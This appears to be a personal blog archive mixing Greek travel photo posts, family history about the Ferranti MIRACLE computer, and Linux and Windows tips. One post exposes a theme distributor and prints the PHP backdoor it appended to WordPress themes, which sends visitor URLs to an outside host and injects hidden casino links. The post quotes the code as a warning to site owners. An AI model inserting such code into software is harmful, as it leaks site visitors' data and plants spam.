This is excellent information! This crap code was in our blog and with your help we removed it! This is a pretty crap thing for Templatebrowser to do...

Their Joomla page was just taken offline (404). Perhaps it helped that I complained to his provider, and to Google (who placed the ad).

Greece is being destroyed by 'respectable' fanatics

Greece

"The EU's terms do not begin to match the altruism the United States showed to the defeated Germans after 1945. America did not pauperise West Germans as many in France and indeed Washington wanted. America guaranteed their security, then gave them loans from the Marshall Plan that allowed the West German economic miracle to begin. Greece has invaded no one and committed no crimes against humanity. Yet the EU, which boasts that solidarity is its founding principle, is forcing it into destitution and chaos."

GConf Error

ICT, Linux

Got this error message while starting gedit through a 'ssh -X' to a CentOS6 box:

GConf Error: Failed to contact configuration server; some possible causes are that you need to enable TCP/IP networking for ORBit, or you have stale NFS locks due to a system crash. See http://projects.gnome.org/gconf/ for information. (Details - 1: Failed to get connection to session: /bin/dbus-launch terminated abnormally without any error message)

Fixed it by installing dbus-x11 on the remote host.

Mail from an enthousiastic Follow That Page user:

I KISS YOU!

I foolishly missed out on buying some Glastonbury tickets. It's a big music festival in the UK that sells out within 24 hours. Knowing that they sometimes make a tiny amount available, I had Follow That Page look at the ticket site.

Today, a month after they first went on sale, my phone beeped at me. The page had changed. SOLD OUT had changed to CLICK HERE. I ran to the nearest internet connection and bought my ticket.

An hour later they were all sold out again.

THANK YOU! The internet is great because of people like you.

Templatesbrowser.com puts phishing code in Joomla

ICT

I have already told you that Templatesbrowser puts linkspam in Wordpress templates.

Now they do something similar with an adapted version of content management system Joomla, according to this discussion:

forum.joomla.org...

The PHP code sends every URL requested by your visitors to templatesbrowser.com, including all parameters. In other words, templatesbrowser monitors exactly what your visitors do on your Joomla website.
Additionally, it can return a piece of HTML code, probably with link spam, like in their Wordpress templates.

Conclusion: only download software from reliable sources.

The Ferranti Miracle archive of Lidy

ICT

I have put the digitized archive of my mother Lidy Zweers-De Ronde, about the Ferranti Mark I* at Shell labs (Miracle), online.
www.xs4all.nl/~onnoz/miracle/extra/

My mother got the photos at her work, Shell labs in Amsterdam. They were used as press material and many photos (at the office) were taken by herself and her colleagues. The tape, hm well, she was not allowed to bring it home but I guess we should now all be grateful that she did, for the sake of computer archeology.

www.computer50.org says that one Ferranti Mark 1* went to Holland. I guess that was the one my mother worked with. My mother has studied math and was hired at Shell lab as a (human) calculator/computer. At Shell, they had to calculate chemical substances and processes. She sometimes needed two weeks for certain calculations, with pen & paper and mechanical calculator. And it would happen, that halfway such a calculation, she found out that the result did not pass a simple test like "a squared number should be positive". At a certain time her boss said: never mind that, soon we will start using the Ferranti "MIRACLE", that can do the job much faster.

My mother says they started working with the Miracle in 1953 (because she associates the Miracle with the terrible flood of february 1953) but from several newspapers I see the dates 3 & 4 february 1955 as the official press conference opening. A colleague of my mother, Lunbeck, says 1953, like my mother does. Could it be that it took them two years to build the machine?

MIRACLE was short for Mokums Industrial Research Automatic Calculator for Laboratory and Engineering (Mokum being a nickname for Amsterdam), but it was soon changed into May It Replace All Chaotic Laboratory Experiments. :-)

There was a colleague that discovered how to produce sound on the Ferranti. He programmed the national anthem (Wilhelmus), and it was used when queen Juliana and her husband got a tour. At the grand opening before that, they also played the anthem and some other tune to the press, who were very impressed. The press also found it necessary to point out that computers were not robots and most certainly could not think for themselves.

Very funny is a remark in a Shell internal newspaper:
"Het is moeilijk te voorzien wat de toekomst op dit gebied zal brengen. Het laat zich aanzien dat de toekomstige rekenmachines niet veel meer aan snelheid kunnen winnen omdat de ons door de natuur opgelegde maximum snelheid van licht en electriciteit niet overschreden kan worden."
I translate:
"It is difficult to foresee what the future in this field may bring. It is to be expected that future computing machines can't gain much speed because the maximum speed of light and electricity, imposed by nature, can't be exceeded."

My mother has taught people at Shell how to program the computer. People were not satisfied with the previous teacher, who taught only theory. Her intention was to get her students behind the computer as soon as possible, to run a very simple calculation: 3+2. This was very successful: as soon as they got that working (some of them within a week), they were all very proud and happy, and their enthusiasm did the rest.

After a few years, my mother married my father and it was custom that married women quit their job to become housewives. My mother didn't regret that: she had enough of all those numbers. She, quite exceptionally, was offered to stay at Shell a while longer, but she declined.

I once asked a friend to interview my mother and the audio is available and my brother has typed out the text, but I'm afraid it's all in Dutch. I have put the text together with almost all photos and articles; and photos and binary transcription of the only remaining tape. Here they are:
www.xs4all.nl/~onnoz/miracle/extra/

Perhaps you can run the transcription of the interview through a translator like Altavista Babelfish. Perhaps one day I'll have time to translate it.

One of the documents is a summary of the instruction set of the Ferranti Mark 1*. I assume the Miracle was a Mark 1* because of the alphabetically ordered coding.

I found www.computer50.org after Cordula Rooijendijk published a book on Dutch (and English and American) computer history. She interviewed my mother (who never realized Cordula was writing a book) and wrote about her and also a whole chapter about Alan Turing and his work during the war and his tragic ending. It was this book that inspired me to learn a little bit more about the Ferranti Mark 1.

Instruction set of the MIRACLE (Ferranti Mark I, 1953)

ICT

The MIRACLE (Mokums Industrial Research Automatic Calculator for Laboratory and Engineering, or May It Replace All Chaotic Laboratory Experiments) was the first electronic computer in a commercial environment in the Netherlands. That was back in 1953. My mother was one of its programmers. Here is an instruction table for the computer, including printout characters like the at-sign: @. The machine was fed with tape. You can see that the instructions were 5 bits wide.

I'm considering to put this material on Wikipedia. But these days Wikipedia is very strict about copyrights. The material is from around 1953, and according to European copyright laws, the copyright will expire around 2023. The original makers are almost impossible to find, and may very well have died. But the material is too special to leave it hidden in a closet for years, so I'll post it anyway, and if Wikipedia will not have it, I'll post it here.

Driving in Greece

Greece, Linkdump

Be extra careful when you pass slower vehicles and have to cross over to the opposite direction lane . There is no avoiding this maneuver on Greek roads especially if you are stuck behind a slow moving tractor trailer on a long uphill for the last 24 minutes. Maybe it's the pressure of 48 Greek drivers tailgating you cursing and waving frantically in your mirrors, maybe it's the need to get to where you are going sometime this century, or maybe it's your own latent Spartan warrior deep down inside who tends to awaken when you drive uphill behind a tractor trailer with 48 Greek drivers behind you, maybe all these reasons will compel you to forget all your ideas about defensive driving and pass the darn truck even if it is the last thing you would ever do.

Walking on the Trail of Lord Byron (New York Times)

Greece, Linkdump

Elise Maclay writes almost poetically about the Pindos. She makes some minor mistakes (Ionnina and Drakalimmi instead of Ioannina and Drakolimni) but I'm most happy to forgive her. She wrote this in 1990, when I had never been in Greece yet.

FROM childhood, I have loved walking and reading, ideally in close conjunction. A loaf of bread, a jug of wine? For me, a book and a backpack are enough. Especially if I can walk in the footsteps of one of my favorite authors.

Last spring I did just that, roughly approximating the itinerary of the poet George Noel Gordon Byron on his initial foray from Prevesa on the Ionian coast to the interior of northwest Greece.

Templatesbrowser.com puts link spam in WordPress

ICT, Linkdump, Lifelog

My brother Wessel used to be very positive about the thousands of free WordPress themes that you can download to markup your weblog.

But one should be careful. With my web page monitoring service Follow That Page, which also monitors hidden text, I found that my brothers website contained hidden commercial links to casinos and hotels. My brother checked it out and discovered the site that is responsible for all this: www.templatesbrowser.com/wordpress-themes/.

How does Templatesbrowser.com work?
On their site, you can download more than hundred free WordPress themes. These themes come from other websites, but Templatesbrowser.com adds a sneaky piece of code at the end of the file functions.php:

function credits()
{
$url = "http://get.templatesbrowser.com/wp.php?" . "url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}

If you use one of those templates in your WordPress weblog, this piece of PHP code returns the following HTML code:

<div id="copyl" style="display: none;"><a href="http://www.casinotropez.[...]">casino en ligne</a></div>

This produces a link at the bottom of every WordPress page, that is invisible for human readers.

Templatesbrowser.com apparently does this to increase the pagerank of certain websites. We're not sure if Google falls for this little link spam trick. But if Google does find out that your page contains link spam, you risk being punished. That could mean that your website is removed from Google's search result pages.

More information on Wessel's website www.laterna.nl (Dutch only).

[update]
Templatesbrowser now distributes a version of the CMS Joomla with added phishing techniques, so that they can monitor what your visitors do on your Joomla website.

iPod Shuffle sucks

ICT

iPods are cool, people seem to think. Onnoot dit not plan to buy one, but got an iPod Shuffle from his bank as a present. It turns out that the iPod Shuffle leaves so much to be desired, that it's hard to comprehend its success. Here are a few of the cons.

1. Without the iTunes software, you might as well throw your iPod out of the window. Every other MP3 player can be connected to any USB port, after which you can copy your MP3 songs onto it or from it. Not with the iPod. It only accepts its music from iTunes. iTunes renames the music files it puts on the iPod and makes a database that is needed for the iPod to play the music.

2. Because of that, the music that you put on iPod, can't be copied easily back to another hard disk.

3. iPods are not intended to connect to several PC's. If I connect the iPod to another PC than usual, the other iTunes insists on formatting the iPod, in order to put music on it. Not formatted? Then no access to the iPod from that PC.

4. iTunes wants to convert WMA files to AAC files. Unfortunately, AAC is not free of patents. Ogg Vorbis, an open standard, would be a better choice.

5. The iPod Shuffle does not have a radio. Players that cost half the price do. Plus a built-in microphone.

6. The iPod has an external USB cable. This is a special, non-standard cable that has to be connected on the earphone connector. Without that cable there is no connection and thus no battery recharging or music uploading. Normal players have a built-in USB plug.

7. iTunes asks if I want to register the iPod. It's the only player I know of that wants to be registered.

8. iTunes wants to take control of the cdrom player, so that it will play an inserted music cd. I disabled this trigger because I run VMware (virtual machines that also want to access the cdrom player), but iTunes wants to switch this trigger back on. iTunes tries to promote itself as default music player on my PC - while I only run it because the iPod forced me to. I don't like it that Apple tries to force its way into my computer.

9. When I connect the iPod, an extra drive appears to access it as a memory key. But as soon as I start iTunes, the drive disappears. Again, it seems Apple wants to decide how I use my equipment.

10. And now the truth comes out. Several times, iTunes asks if I want to connect to the iTunes Music Store. Conclusion: Apple main goal is not to provide an open music player; Apple wants people to shop in their music store. And they appear to be rather successful at it.

Is there nothing positive to be said about the iPod Shuffle? Well yes, it looks handsome.

But I don't want it anymore. The dubious business practices of Microsoft have made me allergic to vendor lock-in. I thought Apple was more cool.

HP Laserjet 1320 and Laserjet 4345 don't get along

ICT

Here at my work, when I install the driver for the HP Laserjet 4345 MFP, the installation fails when there is a driver for the Laserjet 1320 present. After that, the existing 1320 driver is broken, so I end up with none of both drivers. On PCs without 1320 driver, there is no problem. Pretty weird, with two drivers from the same manufacturer... I have contacted HP about this and if they come up with something worthwhile, I'll post it here.

[update]
HP provided a solution:
1. Remove all drivers (via Printers and Faxes, Device Manager en Add/Remove Software).
2. Install the 1320 driver from cdrom (the driver from the HP website appears not to contain all components). Don't connect the printer before the setup program asks you to.
3. Install the 4345 driver with the HP Network Install Wizard.

Digg.com should have a cache

ICT

The digg effect can strike like lightning. Before you know it, Digg.com sends so many visitors to your website that it can't handle the traffic and becomes unavailable.

There are some things that you can do to prevent it: move images to another dumb & fast server, use a cache for PHP scripts, remove unnecessary functions. But every webmaster has to do that for his own site, preferably in advance. A lot of work for a lot of people.

I read Digg a lot and I often find that a dugg website is not available, especially right after it hits the front page. I digg such a story blindly if the title interests me, and a few days later I check the site again, or I put the site in Follow That Page which will send me an email on the day the website is available.

It would be better if Digg.com had a cache, like Google has. If the digg effect made a website unavailable, you could still read a copy of it from the cache. It could be a very simple 'lynx --dump' text-only output, or it could be a 'gnome-web-photo' output that includes all images.

I will post this article on Digg.com. Probably my site will be crippled by the digg effect, but I don't mind: it would illustrate my point.
If you agree that Digg.com should have a cache, then please digg this article.

Along the Voidhomatis

Photos, Greece, Nature

Vikos-Aoos national park, may 15, 2005. The Voidhomatis (Voidomatis) is the river that springs from the 1000 meter deep Vikos gorge. Along the river is a footpath, that starts from the old bridge near Klidhoniá. In two to three hours you can walk to the new bridge that leads to Papingo, that's the bridge where the rafters start.

Lidy hides behind a "siamese" plane.

Claire at the bridge over the Voidhomatis, not far from Klidhoniá.

Near the bridge lies a wounded bat.

I went walking with Tasos, Katerina and Elli. The first part of the path is easy.

Planes in clear icy water. The "Vikos" brand mineral water comes from this river, perhaps the purest water of Europe.

The path is getting smaller. The trees are getting bigger.

The holes in the trees get bigger too.

Flora and fauna (I didn't take pictures of the snakes though).

Is this a pretty sight? Elli and Tasos in the fairytale forest.

Air plane.

The small deserted monastry of Ayi Anaryiri, half way the path, a hundred meter to the left.

Tasos shoots Elli.

Ladder and poppy.

Every now and then a rubberboat with rafters came down the river. This team came ashore to look at the small monastery.

After this point, Elli, Tasos and Katarina went back to the starting point to have a picknick. I continued.

In the distance: the exit of the Vikos gorge.

Out of the hill side came water, a spring.

Panayia Spilotissa, another small monastry on the other bank of the river. I've already shown you the bridge in Rafting on the Voidhomatis.

The Tangent

Linkdump

Onnoot works a lot these days at the computer and today felt like putting on some music. Google found plenty of progressive radio stations, unfortunately with a lot of rigid, boring progrock. Until Onnoot heard the Swedish/British band The Tangent. Papadizi looking for 'American woman'

Greece, Humor, Linkdump

Papadizi from the Greek province Makedonia is a goat herd with unmistakenable charm and one big wish: to marry an American woman. In more than a dozen episodes he reports about his quest, speaking directly to Monica Lewinsky, Madonna, Cameron Diaz, Paris Hilton and Mister Google - "find me American woman!". He is still a virgin, because goats don't count, and yet he can easily find every womans G-spot, he says.

What happened to Webmin?

ICT

After upgrading to Ubuntu 6.06, you will find that system administration tool Webmin has disappeared. Why is that? The answer was posted on the Dutch Ubuntu site: Webmin is not safe enough and therefore Ubuntu is working on an alternative. Onnoot can't wait.

Upgrade to Ubuntu 6.06

ICT

Do you want to upgrade your firewall PC from Ubuntu Linux 5.10 to 6.06? Then beware of problems with Shorewall, the popular firewall package for Linux.

I like Ubuntu very much, especially because of the almost perfect package management. Even a major upgrade like this one can be done with the usual update manager, and that works fine, except for Shorewall. There are some significent changes in Shorewall 3 compared to 2. You should manually check all configuration files.

Some important things:
- Do you have a file called modules, then replace it by the newer version from /usr/share/doc/shorewall/default-config (if only I had known this, AAAAAARGH!)
- The structure of the zones file is changed: a row like "net net Internet" becomes "net ipv4". See also the comments in the new version of this file.
- The firewall zone (fw) if no longer defined in shorewall.conf, but in the zones file.
- In shorewall.conf (van versie 3), check the value of IP_FORWARDING. I changed it from Keep to On.

Here a general recipy to prevent problems:
1. Backup your /etc/shorewall directory before the upgrade.
2. Do the upgrade. This can take a few hours, if you have many packages installed.
3. After the upgrade, copy the default configuration files from /usr/share/doc/shorewall/default-config to /etc/shorewall.
4 Then open your old configuration files one by one, put them next to the new configuration files and copy your own rules to the new files. Do this with the following files:
interfaces
zones
hosts
policy
rules
masq
shorewall.conf
And with the zones and shorewall.conf files, be careful not to copy your old configuration without reading the comments carefully.

I hope this may save someone some work.

New version of InTranslate

Greece, Taal, ICT

[This page is outdated. Please visit http://www.onnoot.com/wiki/intranslate.]

InTranslate, a Greek dictionary lookup tool for browser Firefox, didn't work from Greek to English. Now it does. Onnoot fixed it.

InTranslate is created by mpeimpiii. The problem was that Greek text was offered to the In.gr dictionary in UTF-8 encoding. But In.gr doesn't want UTF-8, it wants Windows-1253 encoded Greek text. So I built in a small convertor, that converts Greek letters directly from UTF-8 to Windows-1253 URI-encoded.

Beware, I tested this only on my own computer. Use it at your own risk. There is no garantee. Please share your experience here, so that I can further improve the extension. Please mention your Firefox version and language, the version of the InTranslate extension, and the page on which you tested it.

InTranslate 0.2a

Update april 12, 00:29:
Version 0.3 published. Bugfix: the two sigmas were mixed up.
InTranslate 0.3

[Update april 12, 23:30]
After clicking this link, Firefox will tell you it didn't install the software to protect your computer. Click "Edit options", then "Allow" and then "Close", and then try again.

Is it safe? Yes. If you don't trust it, save the file on your disk, open it with WinZip or 7-zip, and have a look at the sources.

[Update may 2]
Newer versions are available. See http://www.onnoot.com/wiki/intranslate.

How to make Firefox extensions

Firefox extension for Greece fans

Greece, Taal

There are many extensions available for the browser Firefox, and some of them are interesting for people who are involved in the Greek language.

InTranslate is a Gr-En-Gr translator. After installing this extension in Firefox, you can select a Greek word on a web page and lookup the English translation with the right mouse button. The other way round works too. Unfortunately it doesn't work with more than one word at once. The extension uses the translator on in.gr, the Greek equivalent of Yahoo. This translator is supposed to work better than that of Altavista.

Greek textbox is a extension that gives Firefox an extra bar, in which you can type Greeklish (Greeklish is Greek text typed in Latin, western alphabet). The extension immediately translates it into Greek characters. This can be useful for people who can't or don't want to change their keyboard settings. Disadvantage is that it only works in Firefox, while adding a Greek keyboard layout to you Windows keyboard settings will work for almost any application.

Trout and beans

Photos, Greece

"Onno, give me some money," my father in law Dimitri said.
Gosh, that's a new development, I thought. My parents in law asking for money. Whenever I try to pay for something, usually they beat me to it. I gave him ten euro, completely insufficient to even the balance.
"I knew there should be a trout farm somewhere here. Now I found it! Come and have a look," he said, and from the saw mill he went upstream. Claire, Lidy, Tjerk and I followed him. There we saw the trout farm. River water plunged from tubes into containers of several meters across in which trout were swimming. We were invited in through the gate. While Dimitri bought fish from the owners, I made this panorama of 5 photos. The trout tasted great that night.

Armata, Epirus, Greece, may 2, 2005.
Claire is looking at a watermill. The mill stands along the mountain road that leads from Konitsa to Elefthero, Paleoselli and further eastwards to Armata. Small villages, where life has hardly been affected by modern times. In Paleoselli there have been a few watermills too.

In the middel you can clearly see the wheel that is turned by the water that comes out of the right tube. The left tube leads to a container that is used for washing sheepwool carpets and blankets/cloths (a typical product of the region).

My father in law Dimitrios offers my mother a helping hand when climbing the mill. In front you can see the saw blade.

Vikos

Photos, Greece

Greece, Zagoria, Vikos, april 30, 2005. Panorama with a view into the Vikos gorge. Onnoot is still trying to think of the best way to photograph this gorge.

Some years ago Onnoot walked below the red spot. The red spot is a scar where once a part of Tymfi collapsed. You can see the remains below. Quite voilent it must have been...
To give an idea of the scale: the difference in height on this photo is 800 meter; the red spot is 200 meter high; a human being would be 1 pixel high. From Vikos we saw three dots moving along a thin line: hikers. 75mm proved a too short focal length to capture them.

The Vikos gorge. The difference in height here is about 1000 meter. That is more than the twin towers on top of each other. It is more than six times the Amsterdam Rembrandt tower. The photo is 332 pixels high, so 1 pixel is about 3 meter. Down below is the river Voidhomatis.

When I turned around, I saw this man butchering an animal for easter.

This is the view from the other side of Vikos. In such a remote place communication is important, hence the collection of antennas.

Flock of sheep near Aristi.

Are you in the mood for more photos? Browse to the site of Tom Dempsey with wonderful photos. He also tries to answer the question whether the Vikos gorge is the deepest in the world.

Papingo

Photos, Greece

Greece, Zagoria, Mikró Pápingo, april 30, 2005. Two very old plane trees on the church square.

A panorama taken in the gallery of the church. On the left are burned out candles next to the door. On the right a view to the village of Vikos, at the end of the Vikos gorge. Many years ago hikers usually got permission to spend the night in this gallery, but now that the area is becoming more popular gradually, hikers are redirected to the local hotels.

The bell house with two curled hooks for ringing the bells. On the background is the church.

A house in Mikro Papingo, with horse shoes above the door for good luck. Small Greek villages don't have street names, only numbers. This house is now number 12 and remains of paint showed that the house had several other numbers in the past.

The office of the World Wildlife Fund is open to visitors. Inside: souvenirs, folders and many photos of flora and fauna.

A kafenio with a nice view to Piryi, the "towers" of Papingo.

The natural pools of Papingo can be found near the road between Mikro Papingo and Megalo Papingo. The location can be recognised by a small stream of water, a wall and a parking space. It can be a bit crowded but the walk upstream is absolutely worth the effort.
(And, gentlemen of travel agencies, don't use these photos without permission because you would be send a bill with the formidable rates of the Dutch photography federation increased by a minimum of 300% extra for unpermitted use. However, when asked beforehand I will charge very reasonable prices.)

Vertical panorama made of two photos. The local youth of Papingo used these pools to learn to swim.

Onnoot couldn't continue here without getting wet. This photo was taken around a corner by holding the camera forward while leaning over.

Next item: Vikos.

Konitsa's photographer, Lambros Raptis, makes photos of participants that they can view and buy afterwards. Rafting is still high on Onnoots wish list. Greece, Konitsa, Ayios Ilias, april 27, 2005.
Konitsa town lies humble at the feet of Tymfi and Trapezitsa, seen from Ayios Ilias.

A Greek tradition: they build a church on top of a mountain and dedicate it to Ayos Ilias (saint Elia). But I haven't seen such a large cross to accompany it.

The border with Albania crosses the mountain in the background.

Citroen at 1045m, centre rear Astraka (2436m), one of the tops of Tymfi.

Aoos river, here at 400m, seen from Ayios Ilias (1045m). The difference in height is 645m. That's twice the height of Vaalserberg, the highest Dutch hill. And Ayios Ilias is only a dwarf compared to Smolikas and Tymfi.

The wax statue museum of Pavlos Vrellis

Greece, Photos

Greece, Ioannina, april 26, 2005. On our way to the Vrellis museum we stopped in Ioannina.

An old house, probably once damaged in an earthquake. Often such houses are left there standing until the family has gathered enough money to repair them.

This one was opposite the street.

In the garden of the Vrellis museum.

I had a conversation with this man. He was a professor and an artist, he told me in a mixture of German and English. An idea came to my mind.
"What's your name?" I asked.
"Pavlos Vrellis," he replied.
I shook his hand enthousiastically. My friend Yorgos had written once that mister Vrellis has the habit of walking around his museum. And indeed.

The museum is built in the the typical style for northern Greece. In the beautiful Zagoria (on the other side of Ioannina) there are many of such houses, and also on mount Pilion, on the eastern coast between Thessaloniki and Athens.

Here the scene that Yorgos describes in his article:
"Undoubtedly the favourite scene is the Murder of Ali Pasha. Set in Ali's monastery hideaway, it features "kra Vassiliki" Ali's Greek wife, walking serenely away from a comically gory scene, a severed head at her feet. In one corner, a man looks in horror at his realistically-rendered severed foot, while overhead, Ali's headless body hangs over a balcony."
The serene smile of lady Vassiliki can be explained as a symbolic preview of the Greek independance from Turkey, not long afterwards.

And outside the flowers are still blooming.

15:16. The employees of the museum are bored. The woman in red tries to burn paper waiste inside the canon. This building used to be a monastery. When dictator Ali Pasha was surrounded by the sultans soldiers, het took refuge in this monastery. He was shot from below in his bottom through the wooden floor; that's how he came to his end. The bullet holes are still visible in the floor.

15:21. A painting in the museum shows how the head of Ali Pasha was presented to the sultan, as proof of his death.

16:02. A bench and a boat on the shore of the island. The water here was filled with dead fish. If you come to the island, don't eat fish, unless it's seafish.

Battling Blaster

ICT

Onnoot recently had to go to Spain for his work to remove several computer viruses.

The biggest problems were caused by the Blaster virus. Blaster spreads not by email but by internet connection from computer to computer.

Sometimes parts of Windows are damaged by a virus infection. Therefore Onnoot choose to reinstall Windows from scratch. By the way, Windows 2000 has a repair function, that can be started from cdrom, and it does not require you to reinstall all applications.

With the clean installation, the first thing to do was Windows Update. You probably know, that Windows Update is absolutely necessary to prevent a lot of trouble on your computer. Windows Update also contains a patch against the Blaster virus.

Unfortunately, the PC became infected with Blaster after being connected via ADSL for only a few minutes. Immediately, Blaster blocks the Windows Update website: it turns into a blank page.

Then Onnoot tried to install ZoneAlarm to keep out Blaster. That didn't turn out well: ZoneAlarm refused to let me change the internet zone. (After that, Onnoot discovered Sygate, a very pleasant personal firewall, and less stubborn.)

Then Onnoot switched off the ADSL and connected via an analogue modem to Xs4all in the Netherlands. Onnoot remembered that Xs4all blocks spreading of Blaster on their systems. Alas, a full Windows Update turned out to take half a day. Onnoot didn't want to wait that long, not even with the Costa del Sol at walking distance, because Onnoot does not swim when he is being payed.

So Onnoot went to find the specific patch that makes Windows immune to Blaster. That patch is KB823980. After downloading and installing it, the computer was safe from Blaster infections and Onnoot could use the ADSL connection again. Then Onnoot ran a complete Windows Update.

How could Blaster strike in the first place? Technicians from Telefonica once had configured the ADSL modems to allow incoming Laplink connections. It turned out they had opened all TCP ports. That is more than 65000, while only 1 port is needed for Laplink. Also the port that Blaster uses to spread itself, was open. That was factor one.

Factor two was, that Windows Update had never been run. The local manager was not aware that this is absolutely necessary to keep your computers safe.

Factor three: Telefonica has a monopoly, so their ADSL is expensive and the service is bad. At Telefonica, they don't seem to know or care that they are spreading Blaster. A serieus provider like the Dutch Xs4all just blocks the port that Blaster uses to spread. Xs4all started doing this a few days after Blaster first became known. As a costumer of Xs4all, it is practically impossible to get infected by Blaster. In Spain, Blaster uses a lot of bandwith and therefore slows down ADSL connections. It would be good for Spanish internet if someone at Telefonica would wake up.

The Iraqi Linux user group

ICT

There now is a Iraqi Linux user group. The group already has two members, if this article is correct. That is because Iraq has a vivid trade in illegal software. All software costs 1 dollar. So the need for alternative operating systems is not so big yet. That is likely to change when copyrights are established. It's good that both initiators show the insight to embrace open source software, now that the Iraqi IT business is still like a newly formatted harddisk.

William Vierdag

Lifelog

This is my great-great-grandfather Willem Vierdag. He lived from around 1829 until 1916. He had a textile shop in Enschede in the east of the Netherlands. he had ten children. His sixth child Bernard grew up to be a baker, and when he had a daughter of one year old, his wife died. He had a business to run, so he brought the child (the mother of my mother) to his father Willem.
"O well, we had ten already, another one won't be a problem" I guess he must have thought. And the youngest aunt of my grandmother, Mina, loved the small baby. My grandmother was spoilt in a nice way with the loveliest dresses from Willem's shop, and spoilt in an even better way by the love of her new found family.
Bernard however never spent time on his daughter. He married the sister of his late wife and got two more children, of which he called one exactly the same as my grandmother. The message couldn't be misunderstood: he didn't want to think of his first daughter.
When Bernard died, my grandmother refused her share of the inheritance. "I don't want money from a father that never loved me," she told her half-sisters, "you can keep it."

Ocalan? Yes, the Kurd leader that was arrested by the Turks some years ago and sentenced to death. How that happenend, and what it has to do with the fragile Turkish-Greek relations, is described here.
Meanwhile Onnoot is puzzled by this sign in the monastry. There was no taverna in the neighbourhood. If you have any clue, please share it with us.

This is the icon that is said to cure people by the perfume it leaks, and has supposedly been painted by one of the apostoles. No doubt the metal artwork is from a later date. The crosses above the icon are tokens of gratitute from pilgrims whose prairs have been answered.

Then his mother took him to the monastry, rubbed him with the miraculous perfume and from that day on he was getting better and better. Now he is completely healthy. Every summer, he and his mother visit the monastry. Here, he is folding sleeves for cassette tapes.
In the center is Despina. Coincidently we met her again here in the monastry. Well, not a big coincidence, because the confession father of Maria is the uncle of Despina.

Malevis monastry, Agios Petros, Pelloponisos, Greece, august 25, 2003, 18:41. Panorama of eight photos.
From whole Greece, women with childwish come to this monastry. In the small church is a famous icon that they say has been painted by apostol Luke, sometime in the first century. The icon leaks from time to time a fluid that smells nice. The nuns of the monastry collect this fluid with pads, because they say it can cure many diseases. The pads with the fragrance is given to visitors.
We came especially to visit the confession father of Maria. This priest is also the confession father of the nuns, so he stays there regularly. When the nuns found out Maria had not only the same confession father but that this priest was also a distant uncle of Maria, they gave us a VIP treatment.

Mistral at Mystras

Photos, Greece

Mystras, Greece, august 25, 2003.
"You will have sunny weather all week," said the man from the car rental company in Kalamata.
We were going to Mystras, a medieval archeological fortified city near Sparti. And there a giant wind started blowing. All sand, dried out by weeks of heat, hit us in the eyes, ears, nose and other openings. Somewhere under a gate we had to take shelter. There were ten other visitors hiding. Not that it helped much, because the sand was everywhere. When I opened my camera that night, a beam of sand came poring out that would make an hour glass jealous.
After the wind came the thunder and the rain. From our high position we could see the lightning strike ground below us. On the above picture, the first shower has passed and the second is coming down from the mountains.

Everyone in Konitsa comes to the church square. After shooting this panorama (zeven photos), the square became thrice as crowded. The soldiers made a corridor through the crowd for the procession.
This photo shows a few half transparent people. This phenomenon is called "ghosting" and it occurs in panoramas where the individual photos overlap each other.

The sulfur baths of Kavasila

Photos, Greece

Kavasila, Greece, august 21, 2003.
Every morning a bus goes from Konitsa to the baths of Kavasila. There is a smell of rotting eggs, but after a while one gets used to it. There are baths in the open air and inside a sober building. There are also a doctor and a physio therapist, though the small entrance fee of the dozen guests could never be enough to sustain them. This doctor has measured the blood pressure of Evchenia. Alas, Evchenia has forgotten to take her pills and her blood pressure is too high to bathe.

Microsoft sucks (2)

ICT

In an effort to call Windows more safe than competitors, Steve Ballmer abuses the numbers.

"The first 150 days of Red Hat 6, go check the number, just go check the number. It's five to ten times higher than what we are showing," Ballmer said. Go check the number, well, here we go.

1.
Red Hat 6.0 is four years old and replaced by Red Hat 9. Windows 2003 is brand new. Windows NT, that is as old as Red Hat 6.0, contained twice as many holes as Red Hat.

2.
The number of holes does not tell anything about their severety.

3.
Red Hat comes on three cdroms packed with free software. Windows contains a lot less software. For Windows, you have to buy all that software separately, and it's not taken into the comparison.

The Register
Why Open Source software? Look at the numbers! See chapter 6 paragraph 3.

Onnoot makes more typing errors nowadays. That's partly because Onnoot used to have a fine IBM keyboard, but it's broken now. Now Onnoot has to type on a standard piece of chewing gum.
IBM keyboards are the best. They have a click mechanism that allows you to both feel and hear if a key is properly pressed. This way, you will notice many typo's before you see them on the screen. Unfortunately the very old IBM keyboard (it didn't even have a Windows key!) just stopt working from one moment to the next. Onnoot will have to do more effort to correct errors.

The wife of Grigoris is a famous pianist in Greece and she has tought Maria for years at the conservatory of Athens.

Linux more secure than Windows

ICT

The Register explains why Linux is safer than Windows.

Interestingly, there is one Linux distribution that is less secure: Lindows. Of all distributions, this is the one that most tries to resemble Windows. Not a coincidence, Onnoot thinks.

The island of Parga

Photos, Greece

Parga, Griekenland.
The island is the greatest attraction of Parga. It lies at swimming distance from beach and town. It can be seen from the whole town. It has a small beach with shadow. It has a small chapel. It has a small church. It has a ruin of a small castle, from which you can see the sea and the mainland.

On a hotel at the coast is a sign saying "Andromeda Hotel & Thalassa". Thalassa is the Greek word for sea. It would seem that the sign is addressing Greek tourists in Oostende. But there are hardly any Greek tourists in Oostende. Furthermore, the Greek word for hotel is not hotel but xenothoheo. A mystery...

Now that's weird. I was watching the news (NOS Journaal, the most famous Dutch news program) and suddenly I saw my picture in the background. The next edition also included my photo.
